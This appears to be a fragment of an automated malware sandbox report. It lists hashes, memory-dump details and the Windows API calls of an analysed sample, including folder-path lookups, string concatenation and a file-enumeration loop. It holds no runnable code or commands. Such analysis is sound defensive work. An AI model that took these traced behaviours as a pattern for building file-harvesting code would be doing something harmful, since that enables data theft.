                              • Opcode ID: 3ce3f87c301dc425c74bf3b12a79af17f8d607d5fb9b9e7521a3eda173e40b14
                              • Instruction ID: 5e2bb24b8c7d66e4c22470198afd4da08209deb31558cabbb2824b8dcd0a3282
                              • Opcode Fuzzy Hash: 3ce3f87c301dc425c74bf3b12a79af17f8d607d5fb9b9e7521a3eda173e40b14
                              • Instruction Fuzzy Hash: 0CF09A32A44702DBF773BBB89909BAD37E07F20721F20428DE5D8AB1C1CF6859418B56
                              APIs
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 01004F7A
                              • lstrcat.KERNEL32(?,01011070), ref: 01004F97
                              • lstrcat.KERNEL32(?,01988AF0), ref: 01004FAB
                              • lstrcat.KERNEL32(?,01011074), ref: 01004FBD
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 0100492C
                                • Part of subcall function 01004910: FindFirstFileA.KERNEL32(?,?), ref: 01004943
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FDC), ref: 01004971
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FE0), ref: 01004987
                                • Part of subcall function 01004910: FindNextFileA.KERNEL32(000000FF,?), ref: 01004B7D
                                • Part of subcall function 01004910: FindClose.KERNEL32(000000FF), ref: 01004B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: a22f3ff1f44e3b4b48e27b0e0da6afa08336cc7ccfc59937cf3ab4d69c5f8ca4
                              • Instruction ID: 6ff4aded9385bb160181a78cc0a9a2dd337f909cac1f65b8423bec933edc4124
                              • Opcode Fuzzy Hash: a22f3ff1f44e3b4b48e27b0e0da6afa08336cc7ccfc59937cf3ab4d69c5f8ca4
                              • Instruction Fuzzy Hash: 70217776900208A7D764FB70EC49EE9333CAB54700F404559B6D997188EE7596C88B91